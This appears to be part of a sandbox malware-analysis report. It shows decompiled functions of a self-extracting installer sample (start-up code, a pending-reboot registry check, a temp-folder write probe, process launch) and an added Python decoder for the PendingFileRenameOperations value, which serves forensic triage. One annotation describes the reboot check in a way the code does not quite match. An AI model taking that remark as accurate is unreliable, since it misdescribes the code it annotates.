• DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017542B
• CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175434
• CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175452
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
• API String ID: 1082909758-3862032828
• Opcode ID: b28970800ce633c6244dd82ae4e0043b8b9c3862d3443cd04298f2b2423661c2
• Instruction ID: d49f866618fd57224260ebdf820580ff6930cfb6cba856c9adfbcead43564315
• Opcode Fuzzy Hash: b28970800ce633c6244dd82ae4e0043b8b9c3862d3443cd04298f2b2423661c2
• Instruction Fuzzy Hash: 1511017134050477E720AB2A9C49FAF3A7EEFD5321F408525B64ED2590DFB489C286A2
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
C-Code - Quality: 86%
			E0017256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff; // selector in the low 16 bits of ecx
				_t31 = 0;
				// Checks whether file renames are pending for the next reboot; the selector
				// chooses which registry location is consulted. Returns a non-zero count/size
				// if anything is pending, otherwise 0.
				if(_t13 == 0) {
					_t31 = E001724E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						// Selector 1: number of values under HKLM\...\Session Manager\FileRenameOperations
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) { // HKEY_LOCAL_MACHINE, KEY_READ
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0); // _v8 = lpcValues
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							// Selector 2 or 3: size of the PendingFileRenameOperations value under Session Manager
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed; _v8 = lpcbData
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19); // keep _v8 only if the query returned ERROR_SUCCESS, else 0
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12; // unreachable; decompiler artifact
			}











Instruction addresses for the listing above: 0x00172572 0x00172573 0x00172575 0x00172578 0x0017257d 0x00172627 0x00172583 0x00172586 0x00172589 0x001725eb 0x00172607 0x00000000 0x00172609 0x0017261a 0x00000000 0x0017261a 0x00000000 0x0017258b 0x0017258b 0x0017259e 0x001725b2 0x001725ba 0x001725cb 0x001725d1 0x001725d6 0x001725da 0x001725dd 0x001725dd 0x001725e3 0x001725e3 0x001725e3 0x0017258b 0x00172589 0x0017262f 0x00000000

APIs
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00174096,00174096,?,00171ED3,00000001,00000000,?,?,00174137,?), ref: 001725B2
• RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00174096,?,00171ED3,00000001,00000000,?,?,00174137,?,00174096), ref: 001725CB
• RegCloseKey.KERNELBASE(?,?,00171ED3,00000001,00000000,?,?,00174137,?,00174096), ref: 001725DD
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00174096,00174096,?,00171ED3,00000001,00000000,?,?,00174137,?), ref: 001725FF
• RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00174096,00000000,00000000,00000000,00000000,?,00171ED3,00000001,00000000), ref: 0017261A
In both RegOpenKeyExA calls 80000002 is HKEY_LOCAL_MACHINE and 00020019 is KEY_READ. The function first sizes the PendingFileRenameOperations value under Session Manager, then opens the Session Manager\FileRenameOperations subkey and calls RegQueryInfoKeyA on it, so either location signals a pending reboot.
Strings
• PendingFileRenameOperations, xrefs: 001725C3
• System\CurrentControlSet\Control\Session Manager, xrefs: 001725A8
• System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001725F5
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: OpenQuery$CloseInfoValue
• String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
• API String ID: 2209512893-559176071
• Opcode ID: e0db06eee4f6e41f45adb11b931637b21c22f3b9667b581e93518dd3c8bb50bd
• Instruction ID: fca956e77341edc8e2509a1bb553029b278af1bd15ecb2a202682b7961b1ea0f
• Opcode Fuzzy Hash: e0db06eee4f6e41f45adb11b931637b21c22f3b9667b581e93518dd3c8bb50bd
• Instruction Fuzzy Hash: CB114F35946228BBDB209B919C0DDFFBEBCEF557A1F508055F80DE2050D7305E86D6A1
Uniqueness
Uniqueness Score: -1.00%
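The function above only measures the PendingFileRenameOperations value (RegQueryValueExA with a NULL buffer returns the byte count, which the sbb/and sequence zeroes on failure), so any non-empty value reads as "reboot pending". For triage the content matters more: that REG_MULTI_SZ is where MoveFileEx(..., MOVEFILE_DELAY_UNTIL_REBOOT) queues deletions and replacements, a mechanism malware uses to remove droppers or swap files it cannot overwrite while Windows is running. The Python below is an added example, not code from the Joe Sandbox report or from the sample; it decodes an exported copy of the value offline. It assumes the documented layout of that value (UTF-16LE strings in source/destination pairs, an empty destination meaning delete, a leading "!" on the destination meaning replace-existing, paths carrying the NT "\??\" prefix); the byte string and the paths in it are constructed for illustration, and reboot_pending() mirrors the size-only test the decompiled function performs.

```python
r"""Decode a PendingFileRenameOperations REG_MULTI_SZ value (added example).

Assumptions: the value under HKLM\System\CurrentControlSet\Control\Session Manager
is a REG_MULTI_SZ (UTF-16LE, NUL-separated, double-NUL terminated) holding
(source, destination) pairs as written by MoveFileEx(..., MOVEFILE_DELAY_UNTIL_REBOOT):
an empty destination queues a delete, a destination starting with '!' replaces an
existing file, and paths carry the NT '\??\' prefix.
"""
from dataclasses import dataclass
from typing import List, Optional

NT_PREFIX = "\\??\\"


@dataclass
class PendingOp:
    source: str
    destination: Optional[str]  # None: the source is deleted at boot
    replace_existing: bool

    @property
    def action(self) -> str:
        if self.destination is None:
            return "delete"
        return "replace" if self.replace_existing else "rename"


def strip_nt_prefix(path: str) -> str:
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def parse_multi_sz(raw: bytes) -> List[str]:
    """Split a REG_MULTI_SZ into its strings, keeping interior empty strings
    (an empty destination is meaningful here) and dropping only the terminator."""
    text = raw.decode("utf-16-le")
    if text in ("", "\x00", "\x00\x00"):
        return []
    if text.endswith("\x00\x00"):
        text = text[:-1]            # remove the list terminator, keep per-string NULs
    elif not text.endswith("\x00"):
        text += "\x00"              # tolerate a writer that omitted the final NUL
    return text.split("\x00")[:-1]  # last split element is the empty tail after the final NUL


def parse_pending_file_rename_operations(raw: bytes) -> List[PendingOp]:
    strings = parse_multi_sz(raw)
    if len(strings) % 2:
        raise ValueError("odd number of strings: value is truncated or corrupt")
    ops: List[PendingOp] = []
    for src, dst in zip(strings[0::2], strings[1::2]):
        if dst == "":
            ops.append(PendingOp(strip_nt_prefix(src), None, False))
        else:
            replace = dst.startswith("!")
            target = dst[1:] if replace else dst
            ops.append(PendingOp(strip_nt_prefix(src), strip_nt_prefix(target), replace))
    return ops


def reboot_pending(raw: Optional[bytes]) -> bool:
    """Mirror of the decompiled check: the sample only tests whether the value
    exists (non-zero size), not what it contains."""
    return bool(raw)


def encode_multi_sz(strings: List[str]) -> bytes:
    """Build a REG_MULTI_SZ the way the registry stores it (used for the sample below)."""
    return ("".join(s + "\x00" for s in strings) + "\x00").encode("utf-16-le")


# Constructed sample value; the paths are made up for illustration.
SAMPLE_VALUE = encode_multi_sz([
    NT_PREFIX + "C:\\Temp\\stage.tmp", "",                                                      # delete at boot
    NT_PREFIX + "C:\\Temp\\patched.sys", "!" + NT_PREFIX + "C:\\Windows\\System32\\drivers\\example.sys",  # replace existing
])


def summarize(raw: bytes) -> List[str]:
    return [f"{op.action}: {op.source}" + (f" -> {op.destination}" if op.destination else "")
            for op in parse_pending_file_rename_operations(raw)]


if __name__ == "__main__":
    print("reboot pending:", reboot_pending(SAMPLE_VALUE))
    for line in summarize(SAMPLE_VALUE):
        print(line)
```

On a live host the same bytes come from reg.exe or a forensic registry export; feed them to parse_pending_file_rename_operations() and treat any delete or replace targeting System32, drivers or a security product's directory as worth a closer look.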

Control-flow Graph (rendered in the report with executed and not-executed blocks distinguished; the drawing itself is not reproduced here). Basic blocks of _entry_ that make calls, taken from the graph: 176a60-176a91 (call 177155, call 177208, GetStartupInfoW); 176aaf-176aba (Sleep); 176ac7-176acf (_amsg_exit); 176ad9-176ae9 (call 176c3f); 176b13-176b24 (_initterm); 176b44-176b51 (call 177060); 176ba3-176bbc (call 172bfb); 176bbe-176bbf (exit); 176bd6-176be3 (_ismbblead); 176c27-176c2d (_cexit); 176c39-176c3e (call 17724d).
C-Code - Quality: 51%
			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				// MSVC CRT start-up stub (the __tmainCRTStartup pattern). The globals below behave as
				// __native_startup_lock (0x1788ac), __native_startup_state (0x1788b0: 0 uninitialized,
				// 1 initializing, 2 initialized), has_cctor (0x1781e4) and __dyn_tls_init_callback (0x1788b4).
				// Nothing sample-specific runs before this lock-protected initialization completes; in this
				// pattern the later call at 172bfb whose result feeds exit (see the graph) corresponds to main.
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;
				intOrPtr _t71; // used below; the decompiler left it undeclared

				E00177155(); // likely __security_init_cookie, the first call in mainCRTStartup
				_push(0x58);
				_push(0x1772b8);
				E00177208(__ebx, __edi, __esi); // _SEH_prolog4-style frame setup: frame size 0x58, scope table at 0x1772b8
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4)); // NtCurrentTeb()->NtTib.StackBase, used as this thread's lock token
				_t53 = 0; // stays 0 when this call takes the lock itself (and must release it later)
				while(1) {
					asm("lock cmpxchg [edx], ecx"); // InterlockedCompareExchange(&__native_startup_lock, StackBase, 0)
					if(0 == 0) { // decompiler lost the ZF test: leave the loop when the lock was free (old value 0)
						break;
					}
					if(0 != _t56) { // lock held by another thread: wait one second and retry
						Sleep(0x3e8);
						continue;
					} else { // lock already held by this thread (re-entered start-up)
						_t58 = 1;
						_t53 = 1;
					}
					L7: // also reached after the break above; the decompiler's loop shape is imprecise here
					_t67 =  *0x1788b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x1788b0; // 0x2
						if(__eflags != 0) {
							 *0x1781e4 = _t58; // already initialized: has_cctor = 1
							goto L13;
						} else {
							 *0x1788b0 = _t58; // state = initializing
							_t37 = E00176C3F(0x1710b8, 0x1710c4); // executed; _initterm_e(__xi_a, __xi_z) runs the C initializers
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff; // an initializer failed: return 255
							}
						}
					} else {
						_push(0x1f);
						L00176FF4(); // state was already "initializing": _amsg_exit(31), CRT runtime error R6031
						L13:
						_t68 =  *0x1788b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x1710b4);
							_push(0x1710ac);
							L00177202(); // _initterm(__xc_a, __xc_z) runs the C++ static constructors
							 *0x1788b0 = 2; // state = initialized
						}
						if(_t53 == 0) {
							 *0x1788ac = 0; // release __native_startup_lock
						}
						_t71 =  *0x1788b4;
						if( *0x1788b4 != 0 && E00177060(_t71, 0x1788b4) != 0) { // __dyn_tls_init_callback set and _IsNonwritableInCurrentImage(); the report's listing ends here
                                                                                                                                                                                                    							_t60 =  *0x1788b4; // 0x0
                                                                                                                                                                                                    							 *0x17a288(0, 2, 0);
                                                                                                                                                                                                    							 *_t60();
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                    						_t59 =  *_t25;
                                                                                                                                                                                                    						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t41 =  *_t59;
                                                                                                                                                                                                    							if(_t41 > 0x20) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(_t41 != 0) {
                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                    									goto L32;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                    										_t59 = _t59 + 1;
                                                                                                                                                                                                    										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    										_t41 =  *_t59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                    							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t29 = 0xa;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(_t29);
                                                                                                                                                                                                    							_t30 = E00172BFB(0x170000, 0, _t59); // executed
                                                                                                                                                                                                    							 *0x1781e0 = _t30;
                                                                                                                                                                                                    							__eflags =  *0x1781f8;
                                                                                                                                                                                                    							if( *0x1781f8 == 0) {
                                                                                                                                                                                                    								exit(_t30); // executed
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *0x1781e4;
                                                                                                                                                                                                    							if( *0x1781e4 == 0) {
                                                                                                                                                                                                    								__imp___cexit();
                                                                                                                                                                                                    								_t30 =  *0x1781e0; // 0x80070002
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    							goto L40;
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							__eflags = _t41 - 0x22;
                                                                                                                                                                                                    							if(_t41 == 0x22) {
                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                    								_t15 = _t54 == 0;
                                                                                                                                                                                                    								__eflags = _t15;
                                                                                                                                                                                                    								_t54 = 0 | _t15;
                                                                                                                                                                                                    								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                    							__imp___ismbblead(_t26);
                                                                                                                                                                                                    							__eflags = _t26;
                                                                                                                                                                                                    							if(_t26 != 0) {
                                                                                                                                                                                                    								_t59 = _t59 + 1;
                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                    								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t59 = _t59 + 1;
                                                                                                                                                                                                    							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L40:
                                                                                                                                                                                                    					return E0017724D(_t30);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t58 = 1;
                                                                                                                                                                                                    				__eflags = 1;
                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                    			}


















0x00176a60
0x00176a6a
0x00176a6c
0x00176a71
0x00176a78
0x00176a7f
0x00176a85
0x00176a8e
0x00176a91
0x00176a93
0x00176a9c
0x00176aa2
0x00000000
0x00000000
0x00176aa6
0x00176ab4
0x00000000
0x00176aa8
0x00176aaa
0x00176aab
0x00176aab
0x00176abf
0x00176abf
0x00176ac5
0x00176ad1
0x00176ad7
0x00176b05
0x00000000
0x00176ad9
0x00176ad9
0x00176ae9
0x00176af0
0x00176af2
0x00000000
0x00176af4
0x00176af4
0x00176afb
0x00176afb
0x00176af2
0x00176ac7
0x00176ac7
0x00176ac9
0x00176b0b
0x00176b0b
0x00176b11
0x00176b13
0x00176b18
0x00176b1d
0x00176b24
0x00176b24
0x00176b30
0x00176b39
0x00176b39
0x00176b3b
0x00176b42
0x00176b57
0x00176b5f
0x00176b65
0x00176b65
0x00176b67
0x00176b6c
0x00176b6e
0x00176b71
0x00176b74
0x00176b74
0x00176b79
0x00000000
0x00000000
0x00176b7d
0x00176b81
0x00000000
0x00000000
0x00176b83
0x00176b8c
0x00176b8d
0x00176b90
0x00176b90
                                                                                                                                                                                                    0x00176b83
                                                                                                                                                                                                    0x00176b81
                                                                                                                                                                                                    0x00176b94
                                                                                                                                                                                                    0x00176b98
                                                                                                                                                                                                    0x00176ba2
                                                                                                                                                                                                    0x00176b9a
                                                                                                                                                                                                    0x00176b9a
                                                                                                                                                                                                    0x00176b9a
                                                                                                                                                                                                    0x00176ba3
                                                                                                                                                                                                    0x00176bab
                                                                                                                                                                                                    0x00176bb0
                                                                                                                                                                                                    0x00176bb5
                                                                                                                                                                                                    0x00176bbc
                                                                                                                                                                                                    0x00176bbf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176bbf
                                                                                                                                                                                                    0x00176c1e
                                                                                                                                                                                                    0x00176c25
                                                                                                                                                                                                    0x00176c27
                                                                                                                                                                                                    0x00176c2d
                                                                                                                                                                                                    0x00176c2d
                                                                                                                                                                                                    0x00176c32
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176bc5
                                                                                                                                                                                                    0x00176bc5
                                                                                                                                                                                                    0x00176bc8
                                                                                                                                                                                                    0x00176bcc
                                                                                                                                                                                                    0x00176bce
                                                                                                                                                                                                    0x00176bce
                                                                                                                                                                                                    0x00176bd1
                                                                                                                                                                                                    0x00176bd3
                                                                                                                                                                                                    0x00176bd3
                                                                                                                                                                                                    0x00176bd6
                                                                                                                                                                                                    0x00176bda
                                                                                                                                                                                                    0x00176be1
                                                                                                                                                                                                    0x00176be3
                                                                                                                                                                                                    0x00176be5
                                                                                                                                                                                                    0x00176be5
                                                                                                                                                                                                    0x00176be6
                                                                                                                                                                                                    0x00176be6
                                                                                                                                                                                                    0x00176be9
                                                                                                                                                                                                    0x00176bea
                                                                                                                                                                                                    0x00176bea
                                                                                                                                                                                                    0x00176b74
                                                                                                                                                                                                    0x00176c39
                                                                                                                                                                                                    0x00176c3e
                                                                                                                                                                                                    0x00176c3e
                                                                                                                                                                                                    0x00176abe
                                                                                                                                                                                                    0x00176abe
                                                                                                                                                                                                    0x00000000

APIs
  • Part of subcall function 00177155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00177182
  • Part of subcall function 00177155: GetCurrentProcessId.KERNEL32 ref: 00177191
  • Part of subcall function 00177155: GetCurrentThreadId.KERNEL32 ref: 0017719A
  • Part of subcall function 00177155: GetTickCount.KERNEL32 ref: 001771A3
  • Part of subcall function 00177155: QueryPerformanceCounter.KERNEL32(?), ref: 001771B8
• GetStartupInfoW.KERNEL32(?,001772B8,00000058), ref: 00176A7F
• Sleep.KERNEL32(000003E8), ref: 00176AB4
• _amsg_exit.MSVCRT ref: 00176AC9
• _initterm.MSVCRT ref: 00176B1D
• __IsNonwritableInCurrentImage.LIBCMT ref: 00176B49
• exit.KERNELBASE ref: 00176BBF
• _ismbblead.MSVCRT ref: 00176BDA
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
• String ID:
• API String ID: 836923961-0
• Opcode ID: 6648be2e7f152a4986b58bf5dffc5779c2f0ee77847e60557224dec8c2933c59
• Instruction ID: f71a04d4b8015aad4402ce85319dd1fe99d79d2c7cf4dda7c988c34d70c90b67
• Opcode Fuzzy Hash: 6648be2e7f152a4986b58bf5dffc5779c2f0ee77847e60557224dec8c2933c59
• Instruction Fuzzy Hash: E441C231A84B259FDB259B68D8097697BB0AB49721F64C02AE84DE36D1CF7049C18B81
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
C-Code - Quality: 95%
			E001758C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;
				signed int _t36;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				// inline strlen over the directory path passed in ECX
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				// path length plus 0x14 bytes of slack for the appended file name
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t36); // 0x40 = LMEM_ZEROINIT
				if(_t20 != 0) {
					// copy the directory path, then append a probe file name
					E00171680(_t20, _t36, _t33);
					E0017658A(_t20, _t36, "TMP4351$.TMP");
					// GENERIC_WRITE, CREATE_NEW, FILE_FLAG_DELETE_ON_CLOSE | FILE_ATTRIBUTE_NORMAL:
					// the probe file is removed as soon as the handle is closed
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) { // INVALID_HANDLE_VALUE: directory not writable
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						// fail unless the path exists and carries FILE_ATTRIBUTE_DIRECTORY (0x10)
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x179124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E001744B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x179124 = E00176285();
					_t14 = 0;
				}
				return _t14;
			}

APIs
• LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00175534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 001758E7
• CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00175534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175943
• LocalFree.KERNEL32(00000000,?,00175534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017594D
• CloseHandle.KERNEL32(00000000,?,00175534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017595C
• GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00175534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175963
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
• API String ID: 747627703-2139698323
• Opcode ID: f378232f59475a560d96d3f419772773027d9735469ce5e8dd59700ed09a585d
• Instruction ID: 0f0244874cfc31c34dca915ab699aad29d0b0778ba134f060dc69d3135ee8f46
• Opcode Fuzzy Hash: f378232f59475a560d96d3f419772773027d9735469ce5e8dd59700ed09a585d
• Instruction Fuzzy Hash: DF11267170021167D7241F795C0DA9B7EBAEF86374B508A19B60ED3581CBB0888582A0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (basic blocks of E00173FEF as node id: address range, API calls made in the block, and successor nodes; the rendered graph distinguished executed from not-executed blocks)

• 675: 173fef-174010 -> 676, 677
• 676: 174016-17403b (CreateProcessA) -> 678, 679
• 677: 17410a-17411a (call 176ce0)
• 678: 1740c4-174101 (call 176285, GetLastError, FormatMessageA, call 1744b9) -> 693
• 679: 174041-17406e (WaitForSingleObject, GetExitCodeProcess) -> 682, 683
• 682: 174091 (call 17411b) -> 688
• 683: 174070-174077 -> 682, 687
• 687: 174079-17407b -> 682, 690
• 688: 174096-1740b8 (CloseHandle * 2) -> 691, 692
• 690: 17407d-174089 -> 682, 694
• 691: 1740ba-1740c0 -> 692, 695
• 692: 174108 -> 677
• 693: 174106 -> 692
• 694: 17408b -> 682
• 695: 1740c2 -> 693
C-Code - Quality: 84%
			E00173FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x178004; // 0x4ffa21aa
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00176CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x179124 = E00176285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E001744B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x178a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x179a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x179a2c = _t44;
						}
					}
				}
				E0017411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x179a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

APIs
